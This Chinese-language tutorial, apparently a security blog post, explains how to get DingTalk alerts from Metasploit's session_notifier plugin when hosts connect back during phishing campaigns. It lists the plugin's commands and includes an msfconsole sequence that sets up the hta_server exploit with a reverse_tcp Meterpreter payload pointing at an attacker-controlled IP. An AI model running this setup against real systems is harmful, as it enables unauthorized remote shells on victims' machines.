0x01 前言
我们在进行钓鱼攻击或被动提权时可能需要在MSF长期监听某个端口,等待管理员执行上线,但又不可能随时都盯着监听界面,这样就不能及时得知是否有新主机上线,是不是很不方便呢?最近在metasploit-framework项目中看到安恒@三米前有蕉皮老哥提交的“钉钉通知”拉取请求,现已被rapid7合并到了session_notifier会话通知插件中。
0x01 钉钉机器人webhook配置
我们先在钉钉官网下载Windows客户端并注册一个用户进行登录,然后发起一个群组并在群设置中的智能群助手里添加一个自定义机器人。 
机器人的名称可以随便取,在安全设置中添加一个自定义关键字“session”,这是一个不能修改的固定值。 
0x02 session_notifier插件配置
msfconole命令进入MSF后先用load加载session_notifier插件,将set_session_dingtalk_webhook设置为我们钉钉机器人中的Webhook,然后用start_session_notifier命令开启会话通知即可。
root@:kali~# msfconsole -qmsf6 > load session_notifiermsf6 > set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?access_token=msf6 > start_session_notifier
- 1.
SessionNotifier Commands:
restart_session_notifier //重新启动会话通知save_session_notifier_settings //将所有会话通知设置保存到框架set_session_dingtalk_webhook //设置DingTalk会话通知(关键字: session)set_session_maximum_ip //设置会话通知最大IP范围set_session_minimum_ip //设置会话通知最小IP范围set_session_mobile_carrier //设置手机的移动运营商set_session_mobile_number //设置您要通知的10位手机号码set_session_smtp_address //设置会话通知SMTP地址set_session_smtp_from //设置SMTP发件人set_session_smtp_password //设置SMTP密码set_session_smtp_port //设置会话通知SMTP端口set_session_smtp_username //设置SMTP用户名start_session_notifier //开始会话通知stop_session_notifier //停止会话通知
- 1.
- 1.
随便设置了一个hta_server监听模块来测试一下看是否能够实时收到新上线主机的通知。
msf6 > use exploit/windows/misc/hta_server msf6 exploit(windows/misc/hta_server) > set target 1msf6 exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(windows/misc/hta_server) > set lhost 39.**.*.238msf6 exploit(windows/misc/hta_server) > set lport 443msf6 exploit(windows/misc/hta_server) > exploit
- 1.
这里我们可以看到钉钉群组里已经成功的收到了机器人发送过来的新上线主机通知信息!!!
欢迎关注公众号:web安全工具库
